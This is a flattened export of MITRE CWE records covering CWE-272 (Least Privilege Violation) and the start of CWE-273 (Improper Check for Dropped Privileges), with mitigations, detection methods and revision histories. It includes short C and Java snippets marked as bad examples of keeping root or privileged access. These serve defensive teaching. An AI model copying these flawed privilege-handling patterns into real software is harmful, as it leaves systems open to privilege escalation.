"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed-with-Review
|
This CWE entry is a Class and might have Base-level children that would be more appropriate
|
Examine children of this entry to see if there is a better fit
|
[
"Abstraction"
] | null |
[
{
"CweID": "269",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tchroot(APP_HOME);\n\tchdir(\"/\");\n\tFILE* data = fopen(argv[1], \"r+\");\n\t...\n```",
"IntroText": null,
"Language": "C",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "Constraining the process inside the application's home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-98"
}
] | null | null |
High
| null | 1
|
[
[
"284",
"269",
"271"
]
] |
[
"272",
"273"
] |
272
|
Least Privilege Violation
|
Base
|
Simple
|
Incomplete
|
The elevated privilege level required to perform operations such as chroot() should be dropped immediately after the operation is performed.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity",
"Read Application Data",
"Read Files or Directories"
],
"Likelihood": null,
"Note": "An attacker may be able to access resources with the elevated privilege that could not be accessed with the attacker's original privileges. This is particularly likely in conjunction with another flaw, such as a buffer overflow.",
"Scope": [
"Access Control",
"Confidentiality"
]
}
] |
[
{
"Description": "Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-1",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": null
},
{
"Description": "Follow the principle of least privilege when assigning access rights to entities in a software system.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-48",
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
},
{
"Description": "\n\nCompartmentalize the system to have \"safe\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.\n\n\nEnsure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-46",
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
}
] | null | null |
[
{
"EntryID": null,
"EntryName": "Least Privilege Violation",
"MappingFit": null,
"TaxonomyName": "7 Pernicious Kingdoms"
},
{
"EntryID": null,
"EntryName": "Failure to drop privileges when reasonable",
"MappingFit": null,
"TaxonomyName": "CLASP"
},
{
"EntryID": "POS02-C",
"EntryName": "Follow the principle of least privilege",
"MappingFit": null,
"TaxonomyName": "CERT C Secure Coding"
},
{
"EntryID": "SEC00-J",
"EntryName": "Do not allow privileged blocks to leak sensitive information across a trust boundary",
"MappingFit": null,
"TaxonomyName": "The CERT Oracle Secure Coding Standard for Java (2011)"
},
{
"EntryID": "SEC01-J",
"EntryName": "Do not allow tainted variables in privileged blocks",
"MappingFit": null,
"TaxonomyName": "The CERT Oracle Secure Coding Standard for Java (2011)"
},
{
"EntryID": "SFP36",
"EntryName": "Privilege",
"MappingFit": null,
"TaxonomyName": "Software Fault Patterns"
}
] |
[
"17",
"35",
"76"
] |
[
{
"Authors": [
"Katrina Tsipenyuk",
"Brian Chess",
"Gary McGraw"
],
"Edition": null,
"ExternalReferenceID": "REF-6",
"Publication": "NIST Workshop on Software Security Assurance Tools Techniques and Metrics",
"PublicationDay": "07",
"PublicationMonth": "11",
"PublicationYear": "2005",
"Publisher": "NIST",
"Section": null,
"Title": "Seven Pernicious Kingdoms: A Taxonomy of Software Security Errors",
"URL": "https://samate.nist.gov/SSATTM_Content/papers/Seven%20Pernicious%20Kingdoms%20-%20Taxonomy%20of%20Sw%20Security%20Errors%20-%20Tsipenyuk%20-%20Chess%20-%20McGraw.pdf",
"URLDate": null
}
] |
[
{
"Note": "CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category.",
"Type": "Maintenance"
},
{
"Note": "\n\nIf system privileges are not dropped when it is reasonable to do so, this is not a vulnerability by itself. According to the principle of least privilege, access should be allowed only when it is absolutely necessary to the function of a given system, and only for the minimal necessary amount of time. Any further allowance of privilege widens the window of time during which a successful exploitation of the system will provide an attacker with that same privilege. If at all possible, limit the allowance of system privilege to small, simple sections of code that may be called atomically.\n\n\nWhen a program calls a privileged function, such as chroot(), it must first acquire root privilege. As soon as the privileged operation has completed, the program should drop root privilege and return to the privilege level of the invoking user.\n",
"Type": "Other"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "7 Pernicious Kingdoms",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes",
"ModificationDate": "2008-10-14",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-11-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2009-05-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Other_Notes",
"ModificationDate": "2010-12-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships, Taxonomy_Mappings",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Relationships, Taxonomy_Mappings",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Taxonomy_Mappings",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Causal_Nature, Common_Consequences, Demonstrative_Examples, Modes_of_Introduction, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2019-01-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, References, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Time_of_Introduction",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "271",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] |
[
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tCompare binary / bytecode to application permission manifest",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis - Binary or Bytecode"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tHost-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Automated Results Interpretation"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tHighly cost effective:\n```\n\n\t\tManual Source Code Review (not inspections)\n\t```\n\t\tCost effective for partial coverage:\n```\n\n\t\tFocused Manual Spotcheck - Focused manual analysis of source",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Manual Static Analysis - Source Code"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tSource code Weakness Analyzer\n\t\tContext-configured Source Code Weakness Analyzer",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis - Source Code"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tPermission Manifest Analysis",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tHighly cost effective:\n```\n\n\t\tInspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)\n\t\tFormal Methods / Correct-By-Construction\n\t```\n\t\tCost effective for partial coverage:\n```\n\n\t\tAttack Modeling",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Architecture or Design Review"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following example demonstrates the weakness.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tsetuid(0);\n```\n// Do some important stuff* \n\tsetuid(old_uid);\n\t\n\t *// Do some non privileged stuff.*",
"IntroText": null,
"Language": "C",
"Nature": "Bad",
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following example demonstrates the weakness.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tAccessController.doPrivileged(new PrivilegedAction() {\n\t\t\tpublic Object run() {\n```\n// privileged code goes here, for example:* \n\t\t\t\tSystem.loadLibrary(\"awt\");\n\t\t\t\treturn null;\n\t\t\t\t\n\t\t\t\t *// nothing to return* \n\t\t\t\t}",
"IntroText": null,
"Language": "Java",
"Nature": "Bad",
"Reference": null
}
],
"ID": "DX-142"
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tchroot(APP_HOME);\n\tchdir(\"/\");\n\tFILE* data = fopen(argv[1], \"r+\");\n\t...\n```",
"IntroText": null,
"Language": "C",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "Constraining the process inside the application's home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-98"
}
] | null | null | null | null | 1
|
[
[
"284",
"269",
"271",
"272"
]
] |
[] |
273
|
Improper Check for Dropped Privileges
|
Base
|
Simple
|
Incomplete
|
The product attempts to drop privileges but does not check or incorrectly checks to see if the drop succeeded.
|
If the drop fails, the product will continue to run with the raised privileges, which might provide additional access to unprivileged users.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": "\n\nREALIZATION: This weakness is caused during implementation of an architectural security tactic.\n\n\nThis issue is likely to occur in restrictive environments in which the operating system or application provides fine-grained control over privilege management.\n",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": "If privileges are not dropped, neither are access rights of the user. Often these rights can be prevented from being dropped.",
"Scope": [
"Access Control"
]
},
{
"Impact": [
"Gain Privileges or Assume Identity",
"Hide Activities"
],
"Likelihood": null,
